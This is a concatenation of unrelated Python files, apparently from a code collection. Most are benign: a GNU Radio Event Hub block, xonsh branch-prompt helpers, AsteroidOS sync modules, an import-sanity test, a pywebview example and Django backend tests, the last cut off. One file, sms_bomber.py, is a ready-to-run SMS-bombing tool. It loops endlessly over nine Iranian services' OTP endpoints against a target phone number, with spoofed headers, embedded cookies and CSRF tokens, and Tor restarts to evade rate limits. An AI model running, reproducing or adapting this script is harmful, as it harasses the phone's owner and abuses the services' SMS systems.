self.eventhub_consumer.receive(on_event=self.on_event, starting_position=self.starting_position)
def on_event(self, partition_context, event):
bytes_payload = b"".join(b for b in event.body)
deserialized_data = self.avro_serializer.deserialize(bytes_payload)
#print("packet n is %s" % deserialized_data['pkt_num'])
if deserialized_data['zc_root'] != None and deserialized_data['channel_idx'] != None:
a = pmt.make_dict()
a = pmt.dict_add(a, pmt.string_to_symbol("zc_root"), pmt.from_long(deserialized_data['zc_root']))
a = pmt.dict_add(a, pmt.string_to_symbol("chan_idx"), pmt.from_long(deserialized_data['channel_idx']))
self.message_port_pub(pmt.intern("out"), a)
def work(self, input_items, output_items):
return 0
def stop(self):
self.eventhub_consumer.close()
self.rxthread.join()
|
vc_branch.py
|
# -*- coding: utf-8 -*-
"""Prompt formatter for simple version control branchs"""
import os
import sys
import time
import queue
import builtins
import warnings
import threading
import subprocess
import xonsh.tools as xt
def _get_git_branch(q):
try:
branches = xt.decode_bytes(subprocess.check_output(
['git', 'branch'],
stderr=subprocess.DEVNULL
)).splitlines()
except (subprocess.CalledProcessError, OSError):
q.put(None)
else:
for branch in branches:
if not branch.startswith('* '):
continue
elif branch.endswith(')'):
branch = branch.split()[-1][:-1]
else:
branch = branch.split()[-1]
q.put(branch)
break
else:
q.put(None)
def get_git_branch():
"""Attempts to find the current git branch. If this could not
be determined (timeout, not in a git repo, etc.) then this returns None.
"""
branch = None
timeout = builtins.__xonsh_env__.get('VC_BRANCH_TIMEOUT')
q = queue.Queue()
t = threading.Thread(target=_get_git_branch, args=(q,))
t.start()
t.join(timeout=timeout)
try:
branch = q.get_nowait()
except queue.Empty:
branch = None
return branch
def _get_parent_dir_for(path, dir_name, timeout):
# walk up the directory tree to see if we are inside an hg repo
# the timeout makes sure that we don't thrash the file system
previous_path = ''
t0 = time.time()
while path != previous_path and ((time.time() - t0) < timeout):
if os.path.isdir(os.path.join(path, dir_name)):
return path
previous_path = path
path, _ = os.path.split(path)
return (path == previous_path)
def get_hg_branch(cwd=None, root=None):
env = builtins.__xonsh_env__
cwd = env['PWD']
root = _get_parent_dir_for(cwd, '.hg', env['VC_BRANCH_TIMEOUT'])
if not isinstance(root, str):
# Bail if we are not in a repo or we timed out
if root:
return None
else:
return subprocess.TimeoutExpired(['hg'], env['VC_BRANCH_TIMEOUT'])
if env.get('VC_HG_SHOW_BRANCH') is True:
# get branch name
branch_path = os.path.sep.join([root, '.hg', 'branch'])
if os.path.exists(branch_path):
with open(branch_path, 'r') as branch_file:
branch = branch_file.read()
else:
branch = 'default'
else:
branch = ''
# add bookmark, if we can
bookmark_path = os.path.sep.join([root, '.hg', 'bookmarks.current'])
if os.path.exists(bookmark_path):
with open(bookmark_path, 'r') as bookmark_file:
active_bookmark = bookmark_file.read()
if env.get('VC_HG_SHOW_BRANCH') is True:
branch = "{0}, {1}".format(*(b.strip(os.linesep) for b in
(branch, active_bookmark)))
else:
branch = active_bookmark.strip(os.linesep)
else:
branch = branch.strip(os.linesep)
return branch
_FIRST_BRANCH_TIMEOUT = True
def _first_branch_timeout_message():
global _FIRST_BRANCH_TIMEOUT
sbtm = builtins.__xonsh_env__['SUPPRESS_BRANCH_TIMEOUT_MESSAGE']
if not _FIRST_BRANCH_TIMEOUT or sbtm:
return
_FIRST_BRANCH_TIMEOUT = False
print('xonsh: branch timeout: computing the branch name, color, or both '
'timed out while formatting the prompt. You may avoid this by '
'increaing the value of $VC_BRANCH_TIMEOUT or by removing branch '
'fields, like {curr_branch}, from your $PROMPT. See the FAQ '
'for more details. This message will be suppressed for the remainder '
'of this session. To suppress this message permanently, set '
'$SUPPRESS_BRANCH_TIMEOUT_MESSAGE = True in your xonshrc file.',
file=sys.stderr)
def current_branch(pad=NotImplemented):
"""Gets the branch for a current working directory. Returns an empty string
if the cwd is not a repository. This currently only works for git and hg
and should be extended in the future. If a timeout occurred, the string
'<branch-timeout>' is returned.
"""
if pad is not NotImplemented:
warnings.warn("The pad argument of current_branch has no effect now "
"and will be removed in the future")
branch = None
cmds = builtins.__xonsh_commands_cache__
if cmds.lazy_locate_binary('git') or cmds.is_empty():
branch = get_git_branch()
if (cmds.lazy_locate_binary('hg') or cmds.is_empty()) and not branch:
branch = get_hg_branch()
if isinstance(branch, subprocess.TimeoutExpired):
branch = '<branch-timeout>'
_first_branch_timeout_message()
return branch or None
def _git_dirty_working_directory(q, include_untracked):
status = None
try:
cmd = ['git', 'status', '--porcelain']
if include_untracked:
cmd.append('--untracked-files=normal')
else:
cmd.append('--untracked-files=no')
status = subprocess.check_output(cmd, stderr=subprocess.DEVNULL)
except (subprocess.CalledProcessError, OSError):
q.put(None)
if status is not None:
return q.put(bool(status))
def git_dirty_working_directory(include_untracked=False):
"""Returns whether or not the git directory is dirty. If this could not
be determined (timeout, file not found, etc.) then this returns None.
"""
timeout = builtins.__xonsh_env__.get("VC_BRANCH_TIMEOUT")
q = queue.Queue()
t = threading.Thread(target=_git_dirty_working_directory,
args=(q, include_untracked))
t.start()
t.join(timeout=timeout)
try:
return q.get_nowait()
except queue.Empty:
return None
def hg_dirty_working_directory():
"""Computes whether or not the mercurial working directory is dirty or not.
If this cannot be deterimined, None is returned.
"""
env = builtins.__xonsh_env__
cwd = env['PWD']
denv = env.detype()
vcbt = env['VC_BRANCH_TIMEOUT']
# Override user configurations settings and aliases
denv['HGRCPATH'] = ''
try:
s = subprocess.check_output(['hg', 'identify', '--id'],
stderr=subprocess.PIPE, cwd=cwd,
timeout=vcbt, universal_newlines=True,
env=denv)
return s.strip(os.linesep).endswith('+')
except (subprocess.CalledProcessError, subprocess.TimeoutExpired,
FileNotFoundError):
return None
def dirty_working_directory(cwd=None):
"""Returns a boolean as to whether there are uncommitted files in version
control repository we are inside. If this cannot be determined, returns
None. Currently supports git and hg.
"""
dwd = None
cmds = builtins.__xonsh_commands_cache__
if cmds.lazy_locate_binary('git') or cmds.is_empty():
dwd = git_dirty_working_directory()
if (cmds.lazy_locate_binary('hg') or cmds.is_empty()) and (dwd is None):
dwd = hg_dirty_working_directory()
return dwd
def branch_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are bold, intense colors
for the foreground.
"""
dwd = dirty_working_directory()
if dwd is None:
color = '{BOLD_INTENSE_YELLOW}'
elif dwd:
color = '{BOLD_INTENSE_RED}'
else:
color = '{BOLD_INTENSE_GREEN}'
return color
def branch_bg_color():
"""Return red if the current branch is dirty, yellow if the dirtiness can
not be determined, and green if it clean. These are bacground colors.
"""
dwd = dirty_working_directory()
if dwd is None:
color = '{BACKGROUND_YELLOW}'
elif dwd:
color = '{BACKGROUND_RED}'
else:
color = '{BACKGROUND_GREEN}'
return color
|
sms_bomber.py
|
#dictawtor
#t.me/dictawt0r
import os
import time
import requests
from threading import Thread
proxy = {"https": "127.0.0.1:8000"}
def snap(phone):
#snap api
snapH = {"Host": "app.snapp.taxi", "content-length": "29", "x-app-name": "passenger-pwa", "x-app-version": "5.0.0", "app-version": "pwa", "user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36", "content-type": "application/json", "accept": "*/*", "origin": "https://app.snapp.taxi", "sec-fetch-site": "same-origin", "sec-fetch-mode": "cors", "sec-fetch-dest": "empty", "referer": "https://app.snapp.taxi/login/?redirect_to\u003d%2F", "accept-encoding": "gzip, deflate, br", "accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6", "cookie": "_gat\u003d1"}
snapD = {"cellphone":phone}
try:
snapR = requests.post("https://app.snapp.taxi/api/api-passenger-oauth/v2/otp", headers=snapH, json=snapD, proxies=proxy)
if "OK" in snapR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def shad(phone):
#shad api
shadH = {"Host": "shadmessenger12.iranlms.ir","content-length": "96","accept": "application/json, text/plain, */*","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "text/plain","origin": "https://shadweb.iranlms.ir","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://shadweb.iranlms.ir/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
shadD = {"api_version":"3","method":"sendCode","data":{"phone_number":phone.split("+")[1],"send_type":"SMS"}}
try:
shadR = requests.post("https://shadmessenger12.iranlms.ir/", headers=shadH, json=shadD, proxies=proxy)
if "OK" in shadR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def gap(phone):
#gap api
gapH = {"Host": "core.gap.im","accept": "application/json, text/plain, */*","x-version": "4.5.7","accept-language": "fa","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","appversion": "web","origin": "https://web.gap.im","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://web.gap.im/","accept-encoding": "gzip, deflate, br"}
try:
gapR = requests.get("https://core.gap.im/v1/user/add.json?mobile=%2B{}".format(phone.split("+")[1]), headers=gapH, proxies=proxy)
if "OK" in gapR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def tap30(phone):
#tap30 api
tap30H = {"Host": "tap33.me","Connection": "keep-alive","Content-Length": "63","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "application/json","Accept": "*/*","Origin": "https://app.tapsi.cab","Sec-Fetch-Site": "cross-site","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "https://app.tapsi.cab/","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
tap30D = {"credential":{"phoneNumber":"0"+phone.split("+98")[1],"role":"PASSENGER"}}
try:
tap30R = requests.post("https://tap33.me/api/v2/user", headers=tap30H, json=tap30D, proxies=proxy)
if "OK" in tap30R.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def emtiaz(phone):
#emtiaz api
emH = {"Host": "web.emtiyaz.app","Connection": "keep-alive","Content-Length": "28","Cache-Control": "max-age\u003d0","Upgrade-Insecure-Requests": "1","Origin": "https://web.emtiyaz.app","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q\u003d0.9,image/webp,image/apng,*/*;q\u003d0.8,application/signed-exchange;v\u003db3;q\u003d0.9","Sec-Fetch-Site": "same-origin","Sec-Fetch-Mode": "navigate","Sec-Fetch-User": "?1","Sec-Fetch-Dest": "document","Referer": "https://web.emtiyaz.app/login","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","Cookie": "__cfduid\u003dd3744e2448268f90a1ea5a4016884f7331596404726; __auc\u003dd86ede5a173b122fb752f98d012; _ga\u003dGA1.2.719537155.1596404727; __asc\u003d7857da15173c7c2e3123fd4c586; _gid\u003dGA1.2.941061447.1596784306; _gat_gtag_UA_124185794_1\u003d1"}
emD = "send=1&cellphone=0"+phone.split("+98")[1]
try:
emR = requests.post("https://web.emtiyaz.app/json/login", headers=emH, data=emD, proxies=proxy)
print ("sended sms:)")
except:
print ("Error!")
def divar(phone):
#divar api
divarH = {"Host": "api.divar.ir","Connection": "keep-alive","Content-Length": "22","Accept": "application/json, text/plain, */*","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","Content-Type": "application/x-www-form-urlencoded","Origin": "https://divar.ir","Sec-Fetch-Site": "same-site","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "https://divar.ir/my-divar/my-posts","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
divarD = {"phone":phone.split("+98")[1]}
try:
divarR = requests.post("https://api.divar.ir/v5/auth/authenticate", headers=divarH, json=divarD, proxies=proxy)
if "SENT" in divarR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def rubika(phone):
#rubika api
ruH = {"Host": "messengerg2c4.iranlms.ir","content-length": "96","accept": "application/json, text/plain, */*","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "text/plain","origin": "https://web.rubika.ir","sec-fetch-site": "cross-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://web.rubika.ir/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
ruD = {"api_version":"3","method":"sendCode","data":{"phone_number":phone.split("+")[1],"send_type":"SMS"}}
try:
ruR = requests.post("https://messengerg2c4.iranlms.ir/", headers=ruH, json=ruD, proxies=proxy)
if "OK" in ruR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def torob(phone):
#torob api
torobH = {"Host": "api.torob.com","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","accept": "*/*","origin": "https://torob.com","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://torob.com/user/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","cookie": "amplitude_id_95d1eb61107c6d4a0a5c555e4ee4bfbbtorob.com\u003deyJkZXZpY2VJZCI6ImFiOGNiOTUyLTk1MTgtNDhhNS1iNmRjLTkwZjgxZTFjYmM3ZVIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU5Njg2OTI4ODM1MSwibGFzdEV2ZW50VGltZSI6MTU5Njg2OTI4ODM3NCwiZXZlbnRJZCI6MSwiaWRlbnRpZnlJZCI6Miwic2VxdWVuY2VOdW1iZXIiOjN9"}
try:
torobR = requests.get("https://api.torob.com/a/phone/send-pin/?phone_number=0"+phone.split("+98")[1], headers=torobH, proxies=proxy)
if "sent" in torobR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def bama(phone):
#bama api
bamaH = {"Host": "bama.ir","content-length": "22","accept": "application/json, text/javascript, */*; q\u003d0.01","x-requested-with": "XMLHttpRequest","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","csrf-token-bama-header": "CfDJ8N00ikLDmFVBoTe5ae5U4a2G6aNtBFk_sA0DBuQq8RmtGVSLQEq3CXeJmb0ervkK5xY2355oMxH2UDv5oU05FCu56FVkLdgE6RbDs1ojMo90XlbiGYT9XaIKz7YkZg-8vJSuc7f3PR3VKjvuu1fEIOE","content-type": "application/x-www-form-urlencoded; charset\u003dUTF-8","origin": "https://bama.ir","sec-fetch-site": "same-origin","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://bama.ir/Signin?ReturnUrl\u003d%2Fprofile","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","cookie": "CSRF-TOKEN-BAMA-COOKIE\u003dCfDJ8N00ikLDmFVBoTe5ae5U4a1o5aOrFp-FIHLs7P3VvLI7yo6xSdyY3sJ5GByfUKfTPuEgfioiGxRQo4G4JzBin1ky5-fvZ1uKkrb_IyaPXs1d0bloIEVe1VahdjTQNJpXQvFyt0tlZnSAZFs4eF3agKg"}
bamaD = "cellNumber=0"+phone.split("+98")[1]
try:
bamaR = requests.post("https://bama.ir/signin-checkforcellnumber", headers=bamaH, data=bamaD, proxies=proxy)
if "0" in bamaR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def main():
phone = str(input("Target Phone (+98xxx): "))
while True:
Thread(target=snap, args=[phone]).start()
Thread(target=shad, args=[phone]).start()
Thread(target=gap, args=[phone]).start()
Thread(target=tap30, args=[phone]).start()
Thread(target=emtiaz, args=[phone]).start()
Thread(target=divar, args=[phone]).start()
Thread(target=rubika, args=[phone]).start()
Thread(target=torob, args=[phone]).start()
Thread(target=bama, args=[phone]).start()
os.system("killall -HUP tor")
time.sleep(3)
if __name__ == "__main__":
main()
|
module.py
|
import time
import logging
import queue
import threading
import mpd
import pyowm
import pydbus as dbus
from asteroid import Asteroid, DBusEavesdropper, WeatherPredictions
from gi.repository import GLib
def merge_dicts(first, second):
""" Recursively deep merges two dictionaries """
ret = first.copy()
for k, v in second.items():
if isinstance(v, dict) and k in first and isinstance(first[k], dict):
ret[k] = merge_dicts(first[k], v)
else:
ret[k] = v
return ret
class MetaModule(type):
def __init__(self, name, bases, dict_):
self.logger = logging.getLogger(name)
class Module(metaclass=MetaModule):
defconfig = dict()
def __init__(self, **kwargs):
self.config = merge_dicts(self.defconfig, kwargs)
def register(self, app):
self.app = app
self.asteroid = app.asteroid
self.asteroid.dev.properties_changed.connect(self._properties_changed)
def _properties_changed(self, name, changed, lst):
pass
class TimeSyncModule(Module):
def register(self, app):
super(TimeSyncModule, self).register(app)
# We want to do this on startup, but as the dbus-is-blocking issues is
# not solved yet, be careful
if self.asteroid.dev.connected:
self._update_time()
def _update_time(self):
self.asteroid.update_time()
self.logger.info("Time synchronized")
def _properties_changed(self, name, changed, lst):
if changed.get("Connected", False):
self._update_time()
class ReconnectModule(Module):
defconfig = {"timeout_base": 5,
"timeout_max": 300,
"timeout_reset": 120}
def __init__(self, **kwargs):
super(ReconnectModule, self).__init__(**kwargs)
self._last_connected = 0.0
self._timeout = 0
self._condvar = threading.Condition()
self._thread = threading.Thread(target=self._reconnect_fn)
self._thread.daemon = True
def register(self, app):
super(ReconnectModule, self).register(app)
self._thread.start()
def _reconnect_fn(self):
while True:
self._condvar.acquire()
while self.asteroid.dev.connected:
self._condvar.wait(10)
self._condvar.release()
dt = time.time() - self._last_connected
if dt > self.config["timeout_reset"]:
self._timeout = 0
if self._timeout > 0:
self.logger.info("Reconnecting in %d seconds..." % self._timeout)
time.sleep(self._timeout)
else:
self.logger.info("Reconnecting...")
self.asteroid.connect()
self._timeout = min(self._timeout + self.config["timeout_base"],
self.config["timeout_max"])
self.logger.info("Connected!")
def _properties_changed(self, name, changed, lst):
if not changed.get("Connected", True):
self._condvar.acquire()
self._condvar.notify()
self._condvar.release()
elif changed.get("Connected", False):
self._last_connected = time.time()
class NotifyModule(Module):
def register(self, app):
super(NotifyModule, self).register(app)
self._pending = queue.Queue()
self._eavesdropper = DBusEavesdropper(
dbus.SessionBus(),
"org.freedesktop.Notifications",
"Notify",
self._on_notification)
def _notification_send(self):
try:
msg = self._pending.get_nowait()
app_name, id_, app_icon, summary, body, actions, hints, \
expiration = msg.get_body()
self.asteroid.notify(summary, body=body,
id_=(id_ if id_ else None),
app_name=app_name, app_icon=app_icon)
self.logger.info("Sent notification '%s'" % summary)
except queue.Empty:
pass
return bool(self._pending.qsize())
def _on_notification(self, msg):
self._pending.put(msg)
GLib.idle_add(self._notification_send)
class OWMModule(Module):
defconfig = {"update_interval": 2 * 60 * 60 }
def register(self, app):
super(OWMModule, self).register(app)
self._update_weather()
GLib.timeout_add_seconds(self.config["update_interval"], self._update_weather)
def _update_weather(self):
try:
owm = pyowm.OWM(self.config["api_key"])
# TODO: Eventually, autodetecting the location would be nice
forecast = owm.daily_forecast(self.config["location"]).get_forecast()
preds = WeatherPredictions.from_owm(forecast)
self.asteroid.update_weather(preds)
self.logger.info("Weather update sent")
except Exception as e:
# We can't str the exception directly, because a bug in PyOWM python3
# support would lead to another exception
self.logger.error("Weather update failed with %s" % type(e))
return True
class MPDModule(Module):
defconfig = {
"host": "127.0.0.1",
"port": 6600,
"reconnect_period": 5
}
def __init__(self, **kwargs):
super(MPDModule, self).__init__(**kwargs)
self._mpd_watch = self._make_mpd(connect=False)
def _properties_changed(self, name, changed, lst):
if changed.get("Connected", False):
self._send_update()
def _make_mpd(self, connect=True):
cl = mpd.MPDClient()
cl.timeout = 10
if connect:
cl.connect(self.config["host"], self.config["port"])
return cl
def register(self, app):
super(MPDModule, self).register(app)
self.asteroid.register_media_listener(self._command_cb)
GLib.timeout_add_seconds(self.config["reconnect_period"], self._mpd_reconnect)
def _mpd_connection_error_cb(self, src=None, cond=None):
self.logger.warn("MPD connection error, scheduling reconnect")
GLib.timeout_add_seconds(self.config["reconnect_period"],
self._mpd_reconnect)
return False
def _mpd_reconnect(self):
try:
self._mpd_watch.connect(self.config["host"], self.config["port"])
except ConnectionRefusedError as e:
return True
except mpd.ConnectionError:
return False
self.logger.info("MPD connected")
self._send_update()
self._mpd_watch.send_idle()
GLib.io_add_watch(self._mpd_watch, GLib.IO_ERR | GLib.IO_HUP | GLib.IO_NVAL,
self._mpd_connection_error_cb)
GLib.io_add_watch(self._mpd_watch, GLib.IO_IN, self._mpd_cb)
return False
def _send_update(self):
try:
song = self._mpd_watch.currentsong()
status = self._mpd_watch.status()
self.asteroid.update_media(
song.get("title", "Unknown"),
song.get("album", "Unknown"),
song.get("artist", "Unknown"),
status["state"] == "play"
)
except mpd.ConnectionError as e:
self.logger.warn("Attempt to update MPD status failed with %r" % e)
def _mpd_cb(self, src, cond):
try:
changes = self._mpd_watch.fetch_idle()
if "player" in changes:
self._send_update()
self._mpd_watch.send_idle()
except (mpd.ConnectionError, mpd.PendingCommandError) as e:
self.logger.warn("MPD idle fetch failed with %r" % e)
return False
return True
def _command_cb(self, cmd):
try:
mpd = self._make_mpd()
if cmd == Asteroid.MEDIA_COMMAND_PREVIOUS:
mpd.previous()
elif cmd == Asteroid.MEDIA_COMMAND_NEXT:
mpd.next()
elif cmd == Asteroid.MEDIA_COMMAND_PLAY:
mpd.play()
elif cmd == Asteroid.MEDIA_COMMAND_PAUSE:
mpd.pause()
else:
self.logger.error("Unknown media command code %02x" % cmd)
mpd.close()
except Exception as e:
self.logger.warn("Attempted to send media command %02x but failed with %r" % (cmd, e))
|
test_sanity.py
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import importlib
import logging
import pkgutil
from collections import defaultdict
import pytest
from multiprocessing import Queue, Process
from six import PY2
def import_submodules(package_name, skip_list):
""" Import all submodules of a module, recursively, including subpackages.
`skip_list` denotes packages that should be skipped during the import"""
package = importlib.import_module(package_name)
results = []
for loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + '.' + name
if full_name not in skip_list:
imported_module = importlib.import_module(full_name)
if PY2:
reload(imported_module)
else:
importlib.reload(imported_module)
results.append(full_name)
if is_pkg:
results += import_submodules(full_name, skip_list)
return results
@pytest.mark.parallel
def test_no_global_imports_of_banned_package():
"""This test ensures that neither of the banned packages are imported module wise in any of our code files.
If one of the dependencies is needed, they should be imported within a function."""
banned_packages = ["spacy", "mitie", "sklearn", "duckling"]
q = Queue()
# Import tracking needs to be run in a separate process to ensure the environment is clean...
p = Process(target=get_tracked_imports, args=(q,))
p.start()
tracked_imports = q.get(block=True) # import tracking function will put its results in the queue once it finished
def find_modules_importing(name):
return {v for k, vs in tracked_imports.items() if k.startswith(name) for v in vs}
for banned_package in banned_packages:
assert not find_modules_importing(banned_package), \
"No module should import {} globally. Found in {}".format(
banned_package, ", ".join(find_modules_importing(banned_package)))
def get_tracked_imports(q):
import inspect
# To track imports accross modules, we will replace the default import function
try:
# noinspection PyCompatibility
import __builtin__
original_import_function = __builtin__.__import__
except ImportError:
# noinspection PyCompatibility
import builtins
original_import_function = builtins.__import__
tracked_imports = defaultdict(list)
def import_tracking(name, *x, **xs):
caller = inspect.currentframe().f_back
caller_name = caller.f_globals.get('__name__')
tracked_imports[name].append(caller_name)
return original_import_function(name, *x, **xs)
if PY2:
__builtin__.__import__ = import_tracking
else:
builtins.__import__ = import_tracking
# import all available modules and track imports on the way
import_submodules("mynlu", skip_list={})
if PY2:
__builtin__.__import__ = original_import_function
else:
builtins.__import__ = original_import_function
q.put(tracked_imports)
|
load_html.py
|
import webview
import threading
import time
"""
This example demonstrates how to load HTML in a web view window
"""
def load_html():
webview.load_url("http://www.baidu.com")
print(123123)
time.sleep(2)
webview.evaluate_js('alert("w00t")')
print(2222)
if __name__ == '__main__':
t = threading.Thread(target=load_html)
t.start()
webview.config.use_qt = True
# Create a non-resizable webview window with 800x600 dimensions
webview.create_window("Simple browser", width=800, height=600, resizable=True)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
from decimal import Decimal, Rounded
import re
import threading
import unittest
import warnings
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (connection, connections, DEFAULT_DB_ALIAS,
DatabaseError, IntegrityError, reset_queries, transaction)
from django.db.backends import BaseDatabaseWrapper
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.utils import format_number, CursorWrapper
from django.db.models import Sum, Avg, Variance, StdDev
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (TestCase, TransactionTestCase, mock, override_settings,
skipUnlessDBFeature, skipIfDBFeature)
from django.test.utils import ignore_warnings, str_prefix
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.six.moves import range
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
